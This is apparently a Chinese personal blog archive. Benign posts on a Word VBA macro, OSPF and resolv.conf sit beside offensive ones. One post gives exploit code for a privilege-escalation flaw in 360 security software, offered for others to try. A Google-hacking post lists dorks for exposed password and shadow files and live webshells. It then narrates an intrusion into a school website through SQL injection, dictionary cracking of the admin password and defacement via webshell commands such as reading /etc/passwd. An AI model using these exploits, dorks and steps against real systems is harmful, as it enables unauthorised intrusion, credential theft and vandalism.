无言's Blog - -Estreat-

Word 中数字小写“变”大写

109091@qq.com(无言) — Thu,12 Aug 2010 18:03:18 +0800

        慢慢也开始从技术要转成商务了，是啊~干技术是干不了一辈子的~（也算升级了..），所以经常会遇到写写合同、报报价之类的事。而合同中金额部分常有数字小写转大写的情况。
        大家用Word 时应该都是数字写好后，然后通过/插入/编号（office 2007是编号，03应该是数字）转换成大写的方式吧，是挺方便的，但有个问题是不给转换小数点后的数字，当然你可以通过“自动更正”替换内容再行转换就可以，但这种方法会定义很多的自动更正项，显然是比较麻烦。GG一下，有个很简单的办法，通过定义一个宏便可以完成“一劳永逸”...
        启动Word后按下A lt+F11组合键，在打开的工程窗口左侧双击“ThisDocument”进入代码编写窗口，在代码编辑窗口中输入如下代码：

Option Explicit
Sub 小写金额变大写()
Dim Numeric As Currency, IntPart As Long, DecimalPart As Byte, MyField As Field, Lable As String
Dim Jiao As Byte, Fen As Byte, Oddment As String, Odd As String, MyChinese As String
Const ZWDX As String = "壹贰叁肆伍陆柒捌玖零"   '定义一个中文大写汉字常量
On Error Resume Next   '错误忽略
With Selection
    Numeric = VBA.Round(VBA.Val(.Text), 2)   '四舍五入保留小数点后两位,自定义~
    '判断是否在表格中
    If .Information(wdWithInTable) Then _
.MoveRight unit:=wdCell Else .MoveRight unit:=wdCharacter
    '对数据进行判断,是否在指定的范围内
    If VBA.Abs(Numeric) > 2147483647 Then MsgBox "数值超过范围!", _
                                  vbOKOnly + vbExclamation, "Warning": Exit Sub
    IntPart = Int(VBA.Abs(Numeric))   '定义一个正整数
    Odd = VBA.IIf(IntPart = 0, "", "圆")   '定义一个STRING变量
    '插入中文大写前的标签
    Lable = VBA.IIf(Numeric = VBA.Abs(Numeric), "人民币金额大写:　", "人民币金额大写:　负")
    '对小数点后面二位数进行择定
    DecimalPart = (VBA.Abs(Numeric) - IntPart) * 100
    Select Case DecimalPart
    Case Is = 0   '如果是0,即是选定的数据为整数
        Oddment = VBA.IIf(Odd = "", "", Odd & "整")
    Case Is < 10   '<10,即是零头是分
        Oddment = VBA.IIf(Odd <> "", "圆零" & VBA.Mid(ZWDX, DecimalPart, 1) & "分", _
                    VBA.Mid(ZWDX, DecimalPart, 1) & "分")
    Case 10, 20, 30, 40, 50, 60, 70, 80, 90   '如果是角整
        Oddment = "圆" & VBA.Mid(ZWDX, DecimalPart / 10, 1) & "角整"
    Case Else   '既有角,又有分的情况
        Jiao = VBA.Left(CStr(DecimalPart), 1)   '取得角面值
        Fen = VBA.Right(CStr(DecimalPart), 1)   '取得分面值
        Oddment = Odd & VBA.Mid(ZWDX, Jiao, 1) & "角"   '转换为角的中文大写
        Oddment = Oddment & VBA.Mid(ZWDX, Fen, 1) & "分"   '转换为分的中文大写
    End Select
    '指定区域插入中文大写格式的域
    Set MyField = .Fields.Add(Range:=.Range, Text:="= " & IntPart & " \*CHINESENUM2")
    MyField.Select   '选定域(最后是用指定文本覆盖选定区域)
    '如果仅有角分情况下,Mychinese为""
    MyChinese = VBA.IIf(MyField.Result <> "零", MyField.Result, "")
    .Text = Lable & MyChinese & Oddment
End With
End Sub

输入完毕后按下Alt+Q键返回word中，以后只需要框选需要转换的小写金额（不要含有格式标记符）后，按下Alt+F8打开宏对话框，选择“小写金额变大写”宏，并单击“运行”即可快速地得出大写金额。运行该宏可以在选定的文本数据后面插入此金额大写，如果选定范围在表格中，则在右侧单元格中插入金额大写，各位试试吧~~~

360"本地提权"漏洞后门利用代码....

109091@qq.com(无言) — Tue,02 Feb 2010 10:34:29 +0800

圈子里天天都是血雨腥风....360和瑞星整天狗咬狗，这不，哪个点不清的，在瑞星官方上发了一个360的本地提权漏洞..！结果，可想而之，好多人提权了（说真的，360这么垃圾的玩意还真有SB网管装在服务器上啊？）尽管瑞星很快将公布的代码删掉了，但这代码已然是流了出来....对目前所有版本的360都有效... 有兴趣的拿去玩玩吧....

#include
typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_Delete_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);
BREG_Delete_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;
#define AppPath                        "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"
#define TestDeleteKey             HKEY_LOCAL_MACHINE
#define TestDeleteRegPath    "Software\\360Safe\\Update"
#define TestSetKey                   HKEY_LOCAL_MACHINE
#define TestSetPath                  "Software\\360Safe"
BOOL InitBRegDll()
{
         LONG lResult;
         HKEY hKey;
         CHAR cPath[MAX_PATH + 32] = { 0 };
         DWORD dwPathLen = MAX_PATH;
         lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
         if (FAILED(lResult))
                  return FALSE;
         DWORD dwType = REG_SZ;
         lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
         RegCloseKey(hKey);
         if (FAILED(lResult))
                  return FALSE;
         strcat(cPath, "\\deepscan\\BREGDLL.dll");
         HMODULE modBReg = LoadLibraryA(cPath);
         if (!modBReg)
                  return FALSE;
         INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");
         BRegDeleteKey = (BREG_Delete_KEY)GetProcAddress(modBReg, "BRegDeleteKey");
         BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");
         BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");
         BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");
         if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }
         if (!InitRegEngine()) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }
         return TRUE;
}
LONG TestSetRegKey()
{
         HKEY hKey;
         LONG lResult;
         lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
         if (FAILED(lResult))
                  return lResult;
         DWORD dwType = REG_SZ;
         static char szData[] = "TEST VALUE";
         lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
         BRegCloseKey(hKey);
         return lResult;
}
int main(int argc, char *argv[])
{
         if (!InitBRegDll()) {
                  MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);
                  return 1;
         }
         if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
                  MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);
                  return 2;
         }
         if (FAILED(TestSetRegKey())) {
                  MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);
                  return 3;
         }
         MessageBoxA(NULL, "突破系统安全检查，获得最高权限，漏洞利用成功!", "成功", MB_OK);
         return 0;
}

介绍几个同ip地址反查域名的网站

109091@qq.com(无言) — Wed,02 Sep 2009 05:56:17 +0800

      排名第一的当然是http://www.myipneighbors.com/不过近期升级遇到了麻烦停止服务2个多月了,但是它的站长并没有放弃,正在努力寻求解决中.

      排名第二的ip地址反查域名网站我给了国内的http://ip.wen.la/不为别的就因为它的信息全,同一IP在国内的反查域名网站中它查出来的域名最多.不过网站速度有待改进.

      排名第三的我给了http://www.ip-domain.com.cn/这个网站全体仿制了排名第一的http://www.myipneighbors.com/不过在排名第一的网站暂时无法提供服务的情况这个山寨版的IP反查域名网站无疑是我们最佳选择.(也是国人办的网站山寨无处不在)

      排名第四的http://domainbyip.com/是国外IP反查域名的佼佼者,速度也不错,如果我不是中国人的话我会把它排在第二位.

      排名第五的http://whosonmyserver.com/不得不承认这个网站查出来的同服务器域名是最多的但是速度也是最慢的一个如果抛弃速度而言的话这是个不可多得反查域名网站,期待着尽快解决速度问题.

      排名第六的http://www.robtex.com/是一个提供服务很全的反查网站可以反查dns a记录 mx记录等这里不做详细介绍了因为查出来的内容对于绝大部分的人没有什么用处.

      排名第七的http://www.114best.com/ip/国人比较熟悉但是同一IP查出的站点比较少,数据量还有待加强,不过我相信通过努力会解决的毕竟你的身后有13亿人支持你.

      排名第八的http://iy8.net/也是国人做的,数据量比较强大不过和排名第三的http://www.ip-domain.com.cn/有点类似.可能来自同一数据库吧.

      好了以上就是我精心收集和比较的同iP反查域名网站排名结果,希望对你买虚拟主机的时候有用,当然也可以用于旁注哦 :P

eWebEditor IE8下按钮失效的解决办法

109091@qq.com(无言) — Wed,26 Aug 2009 11:25:54 +0800

在eWebEditor的目录里找到Editor.js文件，路径是webedit\Include\Editor.js 用记事本打开，在其中找到如下代码：
if (element.YUSERONCLICK) {
eval(element.YUSERONCLICK + "anonymous()");
}

或
if (element.YUSERONCLICK) eval(element.YUSERONCLICK + "anonymous()");
版本不同可能写法有点区别...

将上面的代码替换为
if(navigator.appVersion.match(/8./i)=='8.')
{
if (element.YUSERONCLICK) eval(element.YUSERONCLICK + "onclick(event)");
}
else
{
if (element.YUSERONCLICK) eval(element.YUSERONCLICK + "anonymous()");
}

现在试试 eWebEditor 编辑器按钮应该可以正常使用了...

在摩纳哥，开奔驰宝马你都不好意思和人家打招呼~~

109091@qq.com(无言) — Sun,15 Mar 2009 14:52:28 +0800

      法国濒临地中海的南部城市尼斯，离摩纳国王国开车一小时的路程，图片是在去摩纳国途中拍摄的，地中海海水分为三种颜色，岸边为白色浪花，稍远处为浅蓝色，更远处是湛蓝色，海水极其清澈，没有一点杂质，看来环保工作做的很不错，海水中游弋的可全是游艇！资产阶级的生活方式真是腐朽啊。

在摩纳哥皇宫见到保时捷卡雷拉

摩纳哥大概有两个地方，除了皇宫就是蒙特卡罗，蒙特卡罗似乎就是赌场的代名词，一走进蒙特卡罗，就看见一辆敞蓬捷豹！

接着看到红色的法拉利

刚走进广场，一辆奔驰旗舰迈巴赫开进，由于马上又开走，因此只照的此照片一张，请注意迈巴赫左侧露出一小脸的是两辆敞蓬劳斯莱斯

刚才被奔驰旗舰迈巴赫档住视线的两辆敞蓬劳斯莱斯，停车时车头的车标自动缩回

两辆劳斯莱斯的侧面！

停在劳斯莱斯旁边的是一辆宾利大陆GT

赌场门口并排停放着两辆敞蓬红色法拉利！

一辆法拉利中的发动机位置，不知算中置还是后置？

啥也不说了，眼泪哗哗地……另一侧也停放了两辆法拉利，其中一辆是敞蓬！

拍的正过瘾时，一辆银灰色林宝坚尼开过来，开车的主就是图中央的这位女士，她将车钥匙交给图中穿制服的侍者，再由侍者将车开进停车场。包包可是LV的…

与上面的车停在一起的是这几辆奔驰车，不知开这些车的车主是否好意思与熟人打招呼... 晕迷中.....

又来一辆车

大街上的阿斯顿•马丁

魅力十足的法拉力跑车屁股!

黑色法拉利

这辆车猛一看不起眼

走近一看，又是一辆宾利

咦，侍者准备把那位LV女士的兰博基尼停到哪里去???!!!...

Oh，my god，我崩溃了，原来是停在这里

玛莎拉蒂V8, 所有跑车都快齐了...

又发现一辆劳斯莱斯,  还是敞蓬的!!!!

仔细一看，停在旁边的是奔驰

奥迪A4敞蓬！第一次见到啊..   啊啊

而街的对面悄悄停着一辆宝马MINI

哇，有人开着老爷车来兜风了

原来是老爷车队，真拉风，无语

全是游艇的地中海不再美丽

...........

8块5毛钱(￥8.50)

109091@qq.com(无言) — Mon,04 Aug 2008 11:39:01 +0800

     一天中午，一个捡破烂的妇女，把捡来的破烂物品送到废品收购站卖掉后，骑着三轮车往回走，经过一条无人的小巷时，从小巷的拐角处，猛地窜出一个歹徒来。这歹徒手里拿着一把刀，他用刀抵住妇女的胸部，凶狠的命令妇女将身上的钱全部交出来。妇女吓傻了，站在那儿一动不动。
     歹徒便开始搜身，他从妇女的衣袋里搜出一个塑料袋，塑料袋里包着一沓钞票。
     歹徒拿着那沓钞票，转身就走。这时，那位妇女反应过来，立即扑上前去，劈手夺下了塑料袋。歹徒用刀对着妇女，作势要捅她，威胁她
放手。妇女却双手紧紧地攥住盛钱的袋子，死活不松手。
     妇女一面死死的护住袋子，一面拼命呼救，呼救声惊动了小巷子里的居民，人们闻声赶来，合力逮住了歹徒。
     众人押着歹徒搀着妇女走进了附近的派出所，一位民警接待了他们。审讯时，歹徒对抢劫一事供认不讳。而那位妇女站在那儿直打哆嗦，脸上冷汗直冒。民警便安慰她：你不必害怕。妇女回答说：我好疼，我的手指被他掰断了。说着抬起右手，人们这才发现，她右手的食指软绵绵的耷拉着。
     宁可手指被掰断也不松手放掉钱袋子，可见那钱袋的数目和分量。民警便打开那包着钞票的塑料袋，顿时，在场的人都惊呆了，那袋子里总共只有8块5毛钱，全是一毛和两毛的零钞。难忘那些一起走过的日子为8块5毛钱，一个断了手指，一个沦为罪犯，真是太不值得了。一时，小城哗然。
     民警迷惘了：是什么力量在支撑着这位妇女，使她能在折断手指的剧痛中仍不放弃这区区的8块5毛钱呢？他决定探个究竟。所以，将妇女送进医院治疗以后，他就尾随在妇女的身后，以期找到问题的答案。但令人惊讶的是，妇女走出医院大门不久，就在一个水果摊儿上挑起了水果，而且挑得那么认真。她用8块5毛钱买了一个梨子、一个苹果、一个橘子、一个香蕉、一节甘蔗、一枚草莓，凡是水果摊儿上有的水果，她每样都挑一个，直到将8块5毛钱花得一分不剩。
     民警吃惊地张大了嘴巴。难道不惜牺牲一根手指才保住的8块5毛钱，竟是为了买一点水果尝尝？
     妇女提了一袋子水果，径直出了城，来到郊外的公墓。民警发现，妇女走到一个僻静处，那里有一座新墓。妇女在新墓前伫立良久，脸上似乎有了欣慰的笑意。然后她将袋子倚着墓碑，喃喃自语：儿啊，妈妈对不起你。妈没本事，没办法治好你的病，竟让你刚13岁时就早早地离开了人世。还记得吗？你临去的时候，妈问你最大的心愿是什么，你说：我从来没吃过完好的水果，要是能吃一个好水果该多好呀。妈愧对你呀，竟连你最后的愿望都不能满足，为了给你治病，家里已经连买一个水果的钱都没有了。可是，孩子，到昨天，妈妈终于将为你治病借下的债都还清了。妈今天又挣了8块5毛钱，孩子，妈可以买到水果了，你看，有橘子、有梨、有苹果，还有香蕉......都是好的。都是妈花钱给你买的完好的水果，一点都没烂，妈一个一个仔细挑过的，你吃吧，孩子，你尝尝吧......

阿加莎.克里斯蒂侦探小说全集

109091@qq.com(无言) — Tue,15 Apr 2008 01:59:24 +0800

想看阿加莎.克里斯蒂的侦探小说全集,
不得已搞了人家两个站,才搞到她的全集。罪过......，罪过......
有兴趣的朋友也看看吧。

阿加莎.克里斯蒂的侦探小说全集

点击下载此文件
MD5：42ef31a2865f0ce89879c1e8ad82f61f
SHA1：1c7bb6301772d17676e2e6edee0501529678dc57

FreeBSD/Linux中避免/etc/resolv.conf 被改写的几种解决办法比较

109091@qq.com(无言) — Wed,09 Apr 2008 10:38:48 +0800

最近又遇到 /etc/resolv.conf 会定时被改写掉的问题了，这回是在FreeBSD中！

在 LAN via NAT 或是 PPPoE 的环境中上Internet，我们总得在 resolv.conf 中指定 DNS server，而这里的 DNS server 是通过 DHCP server 自动获取的，如果不能正确获得则需要手动把 ISP 给出的 DNS server 加入。可有时候一些“聪明”的程序总是会跳出来搞些小动作，把我们自己写入的设定换掉，而且还是轮询的，你再改，没有过几分钟就又被改掉。

之前遇到过的情况有（DNS server 抓不对，且会被改写！）：

Ubuntu 6.10 (Edgy) 通过 ppp 拨号时，只抓到 ADSL Modem DHCP server IP.
Ubuntu 7.04 (Feisty) 那个可恶的network-manager程序会定时抓 ADSL Modem DHCP server IP.

VMWare 中的 Guest OS 以 NAT 网络获取IP的时候，只抓到NAT DHCP server IP.

于是有很多人都跳出来问一个问题：“如何避免 resolv.conf 被修改、改写和覆写等等？“

然而对于＊NIX 这样灵活的系统，解法也有很多，我们一一看来，哪个粗糙，哪个优雅！

解法一：修改 /sbin/dhclient-script，注释掉对 resolv.conf 进行操作的地方.

Linux ：

把 make_resolv_conf 这个函数的调用都给注释掉！

FreeBSD：

把 > resolv.conf 所在的行都给注释掉！

解法二：强制修改 resolv.conf 的文件flag，设定为不可被更改.

Linux：

chattr +i /etc/resolv.conf

FreeBSD：

chflags schg /etc/resolv.conf

解法三：变更DHCP Client的配置文件，在特定的环节追加我们的设定.

Linux (Ubuntu Dist.)：

在 /etc/dhcp3/dhclient.conf 中增加如下设定：prepend domain-name-servers , ;

FreeBSD：

在 /etc/dhclient.conf 中增加如下设定：prepend domain-name-servers , ;

就我自己看来：解法一属于粗糙，解法二属于暴力，解法三才是好办法！

解法三不会变更系统框架，还是原来执行流程。我们只是在默认的prepend环节，多增加prepend的内容，让DHCP Client在得到DNS server信息后，把我们所需要的配置追加在前面。

像童话一样去学习OSPF原理

109091@qq.com(无言) — Thu,20 Mar 2008 10:58:26 +0800

其实你可以把整个网络（一个自治系统AS）看成一个王国，这个王国可以分成几个区(area)，现在我们来看看区域内的某一个人(你所在的机器root)是怎样得到一张世界地图(routing table)的。

　　首先，你得跟你周围的人（同一网段如129.102）建立基本联系。你大叫一声 “我在这！”(发HELLO报文),于是，周围的人知道你的存在，他们也会大叫，这样你知道周围大概有哪些人，你与他们之间建立了邻居(neighbor)关系，当然，他们之间也有邻居关系。

　　在你们这一群人中，最有威望(Priority优先级)的人会被推荐为首领（ Designated Router）首领与你之间是上下级关系(adjacency邻接)，它会与你建立单线联系，而不许你与其它邻居有过多交往，他会说：“那样做的话，街上太挤了 ”。

　　你只好通过首领来知道更多的消息了，首先，你们互通消息，他告诉你他知道的所有地图的地名，你也会告诉他你现知道的地名，当然上也许只有你一个点。 (Database Deion数据库描述报文)

　　你发现地名表中有你缺少的或比你新的东西，你会问他要一份更详细的资料，他发现你的地名表中有他需要的东西，他也会向你索求新资料。(Link State Request连接状态请求报文)

　　当然，你们毫不犹豫地将一份详细资料发送给对方。(Link State Update连接状态升级报文)

　　收到地图后，互相致谢表示收到了。(Link State Ack连接状态响应报文)

　　现在，你已经尽你所能得到一份地图（Link State DataBase连接状态数据库），你去查找地图把到所有地方的路挑一条最近（shortest path最短路）的，记为一张表格（routing table路由表），当然以后查这份表格就知道到目的地的一条最近的路了。地图也要收好，万一表格上的某条路不通了可以通过图去找一条新的路。

　　其实跟你有联系的，只是周围一群人，外面的消息要通过首领来知道。因为你的地图是跟首领的一致，我们假设你是首领，你要去画一份世界地图。

　　你命令所有手下向你通报消息，你可以知道你这一群人的任何一点点小动静（event事件）。你手下还会有同时属于两群人的家伙（同一区内两网段），他会告诉你另一群人的地图，当然也会把你们这一群人的地图泄露，(不过，无所谓啦 )。这样，整个区的地图你知道了（对于不知道的那也没办法，我们尽力了）。

　　通过不停地交换地图，现在，整个区的人都有同样的地图了，住在区边境上的人义不容辞地把这个区的地图（精确到每一群人）发送到别的区，把别的区信息发送进来。国王会把这些边境的人命名为骨干（backbone area）。通过骨干人士的不懈努力，现在，整个国家的地图你都了解得一清二楚了。

　　有些人“里通外国”（AS Boundary Router自治系统边界路由器），他们知道一些“出国”(AS External route自治系统外部路由)的路，当然他们会把这些秘密公之与众（import 引入），通过信息的传递，现在，你已经有一张完整的“ 世界地图”了。

　　OSPF是这样标记最短的路的：对于某个目的地，首先，考虑是否有同一区内部到目的地的路（intra area区域内），如果有，则在其中取一条离你最近的（花费最小），写进你的表格中,这个目的地可能是到本群体某个人也可能是到其他群体的，对于经过其他区域的路由，你会不予考虑，跟自己人（同区域）打交道总比与外人（其他区域）打交道好；如果没有本区的路，你只好通过别的区域了（区域间），你只要在地图上找最近的就是了；如果你发现目的地在国外，你也只能先把它标记到你的表格上，期待什么时候王国扩张到那，你就可以把它标记到国内地图上了。

　　OSPF就是这样，给你一份“世界地图”，并且在上面标记了最短的路，如此而已罢了。。。

Google Hacking.....

109091@qq.com(无言) — Thu,14 Feb 2008 16:48:21 +0800

google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.google hacking其实并非如此简单...

常用的google关键字：
foo1 foo2 (也就是关联，比如搜索xx公司 xx美女)
operator:foo
filetype:123 类型
site:foo.com 相对直接看网站更有意思，可以得到许多意外的信息
intext:foo
intitle: fooltitle 标题哦
allinurl:foo 搜索xx网站的所有相关连接。（踩点必备）
links:foo 不要说就知道是它的相关链接
allintilte:foo.com

我们可以辅助"-" "+"来调整搜索的精确程度

直接搜索密码：(引号表示为精确搜索)
当然我们可以再延伸到上面的结果里进行二次搜索
"index of" htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd ....或者某个比如pcanywhere的密码后缀cif等

越来越有意思了，再来点更敏感信息
"robots.txt" "Disallow:" filetype:txt
inurl:_vti_cnf (FrontPage的关键索引啦，扫描器的CGI库一般都有地)
allinurl: /msadc/Samples/selector/showcode.asp
/../../../passwd
/examples/jsp/snp/snoop.jsp
phpsysinfo
intitle:index of /admin
intitle:"documetation"
inurl: 5800(vnc的端口)或者desktop port等多个关键字检索
webmin port 10000
inurl:/admin/login.asp
intext:Powered by GBook365
intitle:"php shell*" "Enable stderr" filetype:php 直接搜索到phpwebshell

foo.org filetype:inc

ipsec filetype:conf
intilte:"error occurred" ODBC request where (select|insert) 说白了就是说，可以直接试着查查数据库检索，针对目前流行的sql注射，会发达哦
"Dumping data for table" username password
intitle:"Error using Hypernews"
"Server Software"
intitle:"HTTP_USER_AGENT=Googlebot"
"HTTP_USER_ANGET=Googlebot" THS ADMIN
filetype:.doc site:.mil classified 直接搜索军方相关word

检查多个关键字：
intitle:config confixx login password

"mydomain.com" nessus report
"report generated by"
"ipconfig"
"winipconfig"

google缓存利用（hoho，最有影响力的东西）推荐大家搜索时候多"选搜索所有网站"
特别推荐：administrator users 等相关的东西，比如名字，生日等……最惨也可以拿来做字典嘛

……

一些技巧集合：

1) index.of.password
1) filetype:blt "buddylist"
2) "access denied for user" "using password"
2) intitle:"index of" inurl:ftp (pub | incoming)
3) "http://*:*@www" domainname
3) filetype:cnf inurl:_vti_pvt access.cnf
4) auth_user_file.txt
4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
5) The Master List
5) inurl:"install/install.php"
6) allinurl: admin mdb
6) intitle:"welcome.to.squeezebox"
7) passlist.txt (a better way)
7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
8) "A syntax error has occurred" filetype:ihtml
8) intitle:Login intext:"RT is ? Copyright"
9) "# -FrontPage-" inurl:service.pwd
9) ext:php program_listing intitle:MythWeb.Program.Listing
10) orA-00921: unexpected end of SQL command
10) intitle:index.of abyss.conf

NO2:
--------------------------------------------------------------------------------

google hacking的简单实现
使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似.

intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网

页.同理allintitle:也同intitle类似.

cache:
搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.

define:
搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.

filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入

:filetype:doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富:)

info:
查找指定站点的一些基本信息.

inurl:
搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接http://www.xxx.com/xxx/admin,用来找管理员登

陆的URL不错.allinurl也同inurl类似,可指定多个字符.

link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL.

site:
这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL.

对了还有一些*作符也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符，可代表多个字母
"" 精确查询

下面开始说说实际应用

以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.而google正因为其强大的搜索能力往往会

把一些敏感信息透露给他们.用google搜索以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的

同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,可以用google来找网上使用这套程序的站点:
intext:ZeroBoard filetype:php
或者使用:
inurl:outlogin.php?_zb_path= site:.jp
来寻找我们所需要的页面.phpmyadmin是一套功能强大的数据库*作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行*作.我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database

还http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?dir吗?用google找找，你也许还可以找到很多古董级的机器。同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl：winnt system32

前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情况,和上面的原理一样,我们还可以用google来找后台.

利用google完全是可以对一个站点进行信息收集和渗透的，下面我们用google对特定站点进行一次测试。
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中，找到几个该校的几个系院的域名：
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
顺便ping了一下，应该是在不同的服务器.学校一般都会有不少好的资料，先看看有什么好东西没

site:xxxx.com filetype:doc
得到N个不错的doc。

先找找网站的管理后台地址：
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超过获得2个管理后台地址：
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp

还算不错，看看服务器上跑的是什么程序：
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服务器用的应该是IIS，上面用的是asp的整站程序，还有一个php的论坛
a3服务器也是IIS，aspx+asp。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的：
site:a2.xxxx.com intext:ftp://*:*
没找到什么有价值的东西。再看看有没有上传一类的漏洞：
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上发现一个上传文件的页面：
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下，没权限访问。试试注射，
site:a2.xxxx.com filetype:asp
得到N个asp页面的地址，体力活就让软件做吧，这套程序明显没有对注射做什么防范，dbowner权限，虽然不高但已足矣，back a shell不太喜

欢，而且看起来数据库的个头就不小，直接把web管理员的密码暴出来再说，MD5加密过。一般学校的站点的密码都比较有规律，通常都是域名+

电话一类的变形，用google搞定吧。
site:xxxx.com //得到N个二级域名
site:xxxx.com intext:*@xxxx.com //得到N个邮件地址，还有邮箱的主人的名字什么的
site:xxxx.com intext:电话 //N个电话
把什么的信息做个字典吧，挂上慢慢跑。过了一段时间就跑出4个帐号，2个是学生会的，1个管理员，还有一个可能是老师的帐号。登陆上去：
name：网站管理员
pass：a2xxxx7619 //说了吧，就是域名+4个数字
要再怎么提权那就不属于本文讨论访问了，呵呵，到此为止。

这段时间在国外的一些google hack的研究站点看了看，其实也都差不多是一些基本语法的灵活运用，或者配合某个脚本漏洞，主要还是靠

个人的灵活思维。国外对于google hack方面的防范也并不是很多，所以大家还是点到为止，不要去搞破坏拉，呵呵。对于一些在win上跑
apache的网管们应该多注意一下这方面，一个intitle:index of就差不多都出来了:)
1.查找利用php webshell

intitle:"php shell*" "Enable stderr" filetype:php

(注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中，你能找到很多直接在机器上执

行命令的web shell来。如果找到的PHPSHELL不会利用，如果你不熟悉UNIX，可以直接看看LIST，这里就不详细说了，有很多利用价值。要说明

的是，我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令，都是system调用出来的函数(其实用百度及其他搜索引擎都可以，只是填

写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:

echo "召唤" > index.jsp

现在看看首页，已经被我们改成: "召唤" 了。

我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo "" > file

echo "test" >> file

这样一条条打出来，站点首页就成功被替换了。同样的也可以

uname -a;cat /etc/passwd

不过有点要注意，有些WEBSHELL程序有问题，执行不了的，

2.搜索INC敏感信息

在google的搜索框中填入:

Code:

.org filetype:inc